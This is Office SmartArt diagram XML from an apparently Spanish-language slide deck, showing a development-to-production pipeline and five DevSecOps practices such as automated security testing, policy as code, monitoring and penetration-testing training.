    <dgm:cxn modelId="{2F3ED879-B571-4CCC-885C-5E9AC6C47A54}" type="presOf" srcId="{C46D3610-9ADB-4D2B-8AC2-824E2968F6E4}" destId="{6AC52CEB-894F-4FB8-A092-F699E7822924}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{50AC0BB2-4F3E-4E6E-92C9-31D4BBB98BCB}" type="presOf" srcId="{888997A9-2A5C-46E5-B1E4-EEDD148249BF}" destId="{D24FB1E1-6EE7-4BFD-985A-DF43CDAFE9D0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{77D206B6-8FB3-4E84-A632-AEF038EDA91B}" type="presOf" srcId="{55325809-03EB-4D44-9399-FF6557CD19BF}" destId="{5CC2FC0A-40CD-45AF-8A5B-922A54027D01}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{B0A957E1-9268-47D2-A509-9F7F21429900}" type="presOf" srcId="{CA70C3C4-E60D-4276-BC41-E0ED0B086151}" destId="{24131D59-2CCF-4D2A-B419-0FB8D5FD2AA3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{D5B62AEB-3978-47C2-8C2A-2926372AB203}" srcId="{ACD09236-8FFF-4A0A-8C22-5634EDB7807A}" destId="{888997A9-2A5C-46E5-B1E4-EEDD148249BF}" srcOrd="0" destOrd="0" parTransId="{4EF15993-7008-4BDC-BA27-5C728D324FE1}" sibTransId="{C9A1275F-29C8-4177-A3A1-A3DBB577797B}"/>
    <dgm:cxn modelId="{A21692EB-80BC-417D-95A2-DC75B9091F27}" type="presOf" srcId="{C46D3610-9ADB-4D2B-8AC2-824E2968F6E4}" destId="{4B067561-16D6-480F-817E-3627BADDBAF6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{8C14C507-8C40-494E-84CC-2ED5DA5A90A1}" type="presParOf" srcId="{39E97AA5-68D9-4C58-90DB-31345422DA6C}" destId="{40DFBBA2-EF30-4055-A07E-7DDBBA599560}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{5E7A433E-3E75-4798-96FB-E34D29947501}" type="presParOf" srcId="{39E97AA5-68D9-4C58-90DB-31345422DA6C}" destId="{D24FB1E1-6EE7-4BFD-985A-DF43CDAFE9D0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{03B8E4D7-0724-433C-91D1-90F7935130F0}" type="presParOf" srcId="{39E97AA5-68D9-4C58-90DB-31345422DA6C}" destId="{6AC52CEB-894F-4FB8-A092-F699E7822924}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{A00C9970-B1A4-4977-842B-6D1B7B333ADE}" type="presParOf" srcId="{39E97AA5-68D9-4C58-90DB-31345422DA6C}" destId="{5CC2FC0A-40CD-45AF-8A5B-922A54027D01}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{338CB1F2-6ACB-4C3D-94E4-13C7C1C261FE}" type="presParOf" srcId="{39E97AA5-68D9-4C58-90DB-31345422DA6C}" destId="{8761679A-1F39-471B-AE94-1326C0B49FE3}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{5F026506-3F40-4CDC-9F94-4E4D9D051D5F}" type="presParOf" srcId="{39E97AA5-68D9-4C58-90DB-31345422DA6C}" destId="{734B8186-12BB-4FB9-BA17-F2DE2107086B}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{701B0696-68E0-4D3F-9E7D-11EDE19D49CF}" type="presParOf" srcId="{39E97AA5-68D9-4C58-90DB-31345422DA6C}" destId="{4AB657D8-98DC-4C36-AA87-554FEA157735}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{F0EF9765-5B92-47F2-8D5C-4D24D3D1C614}" type="presParOf" srcId="{39E97AA5-68D9-4C58-90DB-31345422DA6C}" destId="{4B273DA3-886F-4839-AC80-101ECB02BA71}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{F3847257-BDB7-4EB7-82B9-D360035E802C}" type="presParOf" srcId="{39E97AA5-68D9-4C58-90DB-31345422DA6C}" destId="{1A2875EC-C3E8-4737-8D32-B59A9B87F970}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{511E2B2E-E316-4160-B694-4B1AB00471A4}" type="presParOf" srcId="{39E97AA5-68D9-4C58-90DB-31345422DA6C}" destId="{4B067561-16D6-480F-817E-3627BADDBAF6}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{565633B9-1B6B-4E8F-BF95-1E86CBAF640B}" type="presParOf" srcId="{39E97AA5-68D9-4C58-90DB-31345422DA6C}" destId="{1BCA4712-ACFB-4E04-BD44-9D72A06813FA}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{6201A3FE-DF3D-437D-8ADA-9C118A285197}" type="presParOf" srcId="{39E97AA5-68D9-4C58-90DB-31345422DA6C}" destId="{24131D59-2CCF-4D2A-B419-0FB8D5FD2AA3}"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dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>3. Despliegue</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1. Desarrollo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2.Preproducción</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Producción</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4" custLinFactX="159532" custLinFactNeighborX="200000" custLinFactNeighborY="2677">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4" custLinFactX="-100000" custLinFactNeighborX="-110037" custLinFactNeighborY="1650">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4" custLinFactX="-81177" custLinFactNeighborX="-100000" custLinFactNeighborY="300">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4">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a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>4. Producción</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1. Desarrollo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2.Preproducción</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Despliegue</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4" custLinFactX="239646" custLinFactNeighborX="300000" custLinFactNeighborY="-3673">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4" custLinFactX="-100000" custLinFactNeighborX="-110037" custLinFactNeighborY="1650">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4" custLinFactX="-81177" custLinFactNeighborX="-100000" custLinFactNeighborY="300">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4" custLinFactX="-80781" custLinFactNeighborX="-100000" custLinFactNeighborY="-320">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dirty="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chemeClr val="bg1">
            <a:lumMod val="65000"/>
          </a:schemeClr>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chemeClr val="bg1">
            <a:lumMod val="65000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" sz="1200" dirty="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rgbClr val="004C41"/>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chemeClr val="bg1">
            <a:lumMod val="65000"/>
          </a:schemeClr>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chemeClr val="bg1">
            <a:lumMod val="65000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" sz="1200" dirty="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rgbClr val="004C41"/>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chemeClr val="bg1">
            <a:lumMod val="65000"/>
          </a:schemeClr>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chemeClr val="bg1">
            <a:lumMod val="65000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" sz="120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rgbClr val="004C41"/>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chemeClr val="bg1">
            <a:lumMod val="65000"/>
          </a:schemeClr>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chemeClr val="bg1">
            <a:lumMod val="65000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" sz="1200" dirty="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rgbClr val="004C41"/>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A5D2C7-07A6-446A-ABE2-03B1E9ADD538}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/default" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_5" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{122E114C-8217-44FB-9AE8-019A28558426}">
      <dgm:prSet phldrT="[Texto]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="004C41">
            <a:alpha val="90000"/>
          </a:srgbClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Cultura de seguridad</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" sz="1600" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Fomentar una cultura de seguridad en toda la organización</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{171A2DE1-B614-42C5-9797-7AEC9E0DEE13}" type="parTrans" cxnId="{EC208F2F-1D1E-4015-A1E3-EBD970D2508C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES" sz="1600">
            <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{148BBC9E-5E12-45D8-B579-DD9C60BF8088}" type="sibTrans" cxnId="{EC208F2F-1D1E-4015-A1E3-EBD970D2508C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES" sz="1600">
            <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5789BBDB-B350-4106-90C7-99FCE5B7B056}">
      <dgm:prSet phldrT="[Texto]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="004C41">
            <a:alpha val="80000"/>
          </a:srgbClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Automatización de pruebas de seguridad</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" sz="1600" b="0" i="0" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Integrar pruebas de seguridad automatizadas en el proceso de desarrollo para detectar vulnerabilidades en el código.</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" sz="1600" dirty="0">
            <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3D671961-35D6-4004-AC5C-8E1D3A537CDF}" type="parTrans" cxnId="{CFDAB2CA-3E5C-4BAF-9A0F-D2CAF01C382F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES" sz="1600">
            <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{56BAEC1E-C3A3-47FA-AA44-312FBB8ADBD5}" type="sibTrans" cxnId="{CFDAB2CA-3E5C-4BAF-9A0F-D2CAF01C382F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES" sz="1600">
            <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7D309523-9236-4FBD-8767-B7B5F3CA644C}">
      <dgm:prSet phldrT="[Texto]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="004C41">
            <a:alpha val="70000"/>
          </a:srgbClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" sz="1600" b="1">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Políticas de seguridad como código</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" sz="1600">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Implementar políticas de seguridad como código para automatizar la aplicación de configuraciones seguras.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A136E362-8B00-498E-95FF-A503FD3C4F9F}" type="parTrans" cxnId="{06B3F58E-402A-4ECF-AA1F-6B6C3D10D29B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES" sz="1600">
            <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{08499AC9-EA41-43C5-98A4-8B28B5EDBE68}" type="sibTrans" cxnId="{06B3F58E-402A-4ECF-AA1F-6B6C3D10D29B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES" sz="1600">
            <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9C54418A-5A7A-425C-A1C0-5558AAB3BE51}">
      <dgm:prSet phldrT="[Texto]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="004C41">
            <a:alpha val="60000"/>
          </a:srgbClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Monitorización continua y detección de amenazas</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" sz="1600" b="0" i="0" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Implementar sistemas de monitorización continua para detectar actividades sospechosas y amenazas en tiempo real.</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" sz="1600" dirty="0">
            <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7549E7D3-6984-450B-BB21-4BD1EE43F2A8}" type="parTrans" cxnId="{B6559D42-83D0-4870-9272-1036A223FF3D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES" sz="1600">
            <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{376C00AF-7A27-4EF7-BE60-5D00A4E0724C}" type="sibTrans" cxnId="{B6559D42-83D0-4870-9272-1036A223FF3D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES" sz="1600">
            <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{078EBC93-35B7-4072-9878-D553BFDFC808}">
      <dgm:prSet phldrT="[Texto]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="004C41">
            <a:alpha val="50000"/>
          </a:srgbClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" sz="1600" b="1" i="0" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Formación y pruebas de penetración</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" sz="1600" b="0" i="0" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Proporcionar formación en seguridad y realizar pruebas de penetración regulares para evaluar la seguridad de la aplicación</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" sz="1600" dirty="0">
            <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2C6AE972-032C-4FA3-80F2-921174141A7C}" type="parTrans" cxnId="{DD71ECED-DC47-413B-BB3A-2E4D8FB1700F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES" sz="1600">
            <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1E7F71D0-F604-4946-9AF0-978C969BBD51}" type="sibTrans" cxnId="{DD71ECED-DC47-413B-BB3A-2E4D8FB1700F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES" sz="1600">
            <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{524A6FA5-5A5E-45EE-9EBB-3311DF4B2B61}" type="pres">
      <dgm:prSet presAssocID="{49A5D2C7-07A6-446A-ABE2-03B1E9ADD538}" presName="diagram" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{66F6964D-23E7-4998-8580-EB5D531AEA34}" type="pres">
      <dgm:prSet presAssocID="{122E114C-8217-44FB-9AE8-019A28558426}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{44EEFACB-CD5B-4FEF-AFB1-6047A17C27EE}" type="pres">
      <dgm:prSet presAssocID="{148BBC9E-5E12-45D8-B579-DD9C60BF8088}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EC3889C4-1234-47BF-A45B-0CE6F63EFA7E}" type="pres">
      <dgm:prSet presAssocID="{5789BBDB-B350-4106-90C7-99FCE5B7B056}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8A29CCC6-70A0-4D64-9E4C-53C823AC5BB0}" type="pres">
      <dgm:prSet presAssocID="{56BAEC1E-C3A3-47FA-AA44-312FBB8ADBD5}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{29601497-DBA4-4463-BF53-107231430CDC}" type="pres">
      <dgm:prSet presAssocID="{7D309523-9236-4FBD-8767-B7B5F3CA644C}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{973E95DF-7FA8-4B1F-8E81-CCB114C8AE09}" type="pres">
      <dgm:prSet presAssocID="{08499AC9-EA41-43C5-98A4-8B28B5EDBE68}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6AFEBF97-AC73-49B1-834E-D736FCA3EF6C}" type="pres">
      <dgm:prSet presAssocID="{9C54418A-5A7A-425C-A1C0-5558AAB3BE51}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{38BA2B31-1339-4362-9D62-C66559E9DB25}" type="pres">
      <dgm:prSet presAssocID="{376C00AF-7A27-4EF7-BE60-5D00A4E0724C}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1D46C4C4-A40E-4BDB-A53B-4F26EDBBFE49}" type="pres">
      <dgm:prSet presAssocID="{078EBC93-35B7-4072-9878-D553BFDFC808}" presName="node" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{32373F05-FA28-435C-8A8B-BA3B413983CC}" type="presOf" srcId="{49A5D2C7-07A6-446A-ABE2-03B1E9ADD538}" destId="{524A6FA5-5A5E-45EE-9EBB-3311DF4B2B61}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{EC208F2F-1D1E-4015-A1E3-EBD970D2508C}" srcId="{49A5D2C7-07A6-446A-ABE2-03B1E9ADD538}" destId="{122E114C-8217-44FB-9AE8-019A28558426}" srcOrd="0" destOrd="0" parTransId="{171A2DE1-B614-42C5-9797-7AEC9E0DEE13}" sibTransId="{148BBC9E-5E12-45D8-B579-DD9C60BF8088}"/>
    <dgm:cxn modelId="{73D25560-163F-4483-8339-3341B5401293}" type="presOf" srcId="{078EBC93-35B7-4072-9878-D553BFDFC808}" destId="{1D46C4C4-A40E-4BDB-A53B-4F26EDBBFE49}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{B6559D42-83D0-4870-9272-1036A223FF3D}" srcId="{49A5D2C7-07A6-446A-ABE2-03B1E9ADD538}" destId="{9C54418A-5A7A-425C-A1C0-5558AAB3BE51}" srcOrd="3" destOrd="0" parTransId="{7549E7D3-6984-450B-BB21-4BD1EE43F2A8}" sibTransId="{376C00AF-7A27-4EF7-BE60-5D00A4E0724C}"/>
    <dgm:cxn modelId="{04601966-C731-4A4C-86A7-CB2A97B6E2B4}" type="presOf" srcId="{5789BBDB-B350-4106-90C7-99FCE5B7B056}" destId="{EC3889C4-1234-47BF-A45B-0CE6F63EFA7E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{C5B24C7C-B725-4162-BCCB-1D2895529AFE}" type="presOf" srcId="{9C54418A-5A7A-425C-A1C0-5558AAB3BE51}" destId="{6AFEBF97-AC73-49B1-834E-D736FCA3EF6C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{06B3F58E-402A-4ECF-AA1F-6B6C3D10D29B}" srcId="{49A5D2C7-07A6-446A-ABE2-03B1E9ADD538}" destId="{7D309523-9236-4FBD-8767-B7B5F3CA644C}" srcOrd="2" destOrd="0" parTransId="{A136E362-8B00-498E-95FF-A503FD3C4F9F}" sibTransId="{08499AC9-EA41-43C5-98A4-8B28B5EDBE68}"/>
    <dgm:cxn modelId="{D5C8CEBF-2C48-4683-A210-DD396571237C}" type="presOf" srcId="{122E114C-8217-44FB-9AE8-019A28558426}" destId="{66F6964D-23E7-4998-8580-EB5D531AEA34}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{CFDAB2CA-3E5C-4BAF-9A0F-D2CAF01C382F}" srcId="{49A5D2C7-07A6-446A-ABE2-03B1E9ADD538}" destId="{5789BBDB-B350-4106-90C7-99FCE5B7B056}" srcOrd="1" destOrd="0" parTransId="{3D671961-35D6-4004-AC5C-8E1D3A537CDF}" sibTransId="{56BAEC1E-C3A3-47FA-AA44-312FBB8ADBD5}"/>
    <dgm:cxn modelId="{DD71ECED-DC47-413B-BB3A-2E4D8FB1700F}" srcId="{49A5D2C7-07A6-446A-ABE2-03B1E9ADD538}" destId="{078EBC93-35B7-4072-9878-D553BFDFC808}" srcOrd="4" destOrd="0" parTransId="{2C6AE972-032C-4FA3-80F2-921174141A7C}" sibTransId="{1E7F71D0-F604-4946-9AF0-978C969BBD51}"/>
    <dgm:cxn modelId="{938B5CFE-1EB7-4DA5-B8AF-C9A3808DFC7D}" type="presOf" srcId="{7D309523-9236-4FBD-8767-B7B5F3CA644C}" destId="{29601497-DBA4-4463-BF53-107231430CDC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{18BB3DB3-98B9-41B9-8D51-9D358044F228}" type="presParOf" srcId="{524A6FA5-5A5E-45EE-9EBB-3311DF4B2B61}" destId="{66F6964D-23E7-4998-8580-EB5D531AEA34}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{9D3B3EEB-C509-4E5E-9BE8-F2BCA7144E17}" type="presParOf" srcId="{524A6FA5-5A5E-45EE-9EBB-3311DF4B2B61}" destId="{44EEFACB-CD5B-4FEF-AFB1-6047A17C27EE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{33D9E2F8-94BD-42B4-B61B-B45BB14C4671}" type="presParOf" srcId="{524A6FA5-5A5E-45EE-9EBB-3311DF4B2B61}" destId="{EC3889C4-1234-47BF-A45B-0CE6F63EFA7E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{5C3BC318-C04F-4F0B-9DD3-66AD83E39FA3}" type="presParOf" srcId="{524A6FA5-5A5E-45EE-9EBB-3311DF4B2B61}" destId="{8A29CCC6-70A0-4D64-9E4C-53C823AC5BB0}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{7E5D71A6-2095-4DE8-97EC-2E588C20C19B}" type="presParOf" srcId="{524A6FA5-5A5E-45EE-9EBB-3311DF4B2B61}" destId="{29601497-DBA4-4463-BF53-107231430CDC}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{1E134E1F-E772-476D-9416-D427B5EE7E97}" type="presParOf" srcId="{524A6FA5-5A5E-45EE-9EBB-3311DF4B2B61}" destId="{973E95DF-7FA8-4B1F-8E81-CCB114C8AE09}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{09A7EE53-13B2-49A5-835F-0D0783B65974}" type="presParOf" srcId="{524A6FA5-5A5E-45EE-9EBB-3311DF4B2B61}" destId="{6AFEBF97-AC73-49B1-834E-D736FCA3EF6C}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
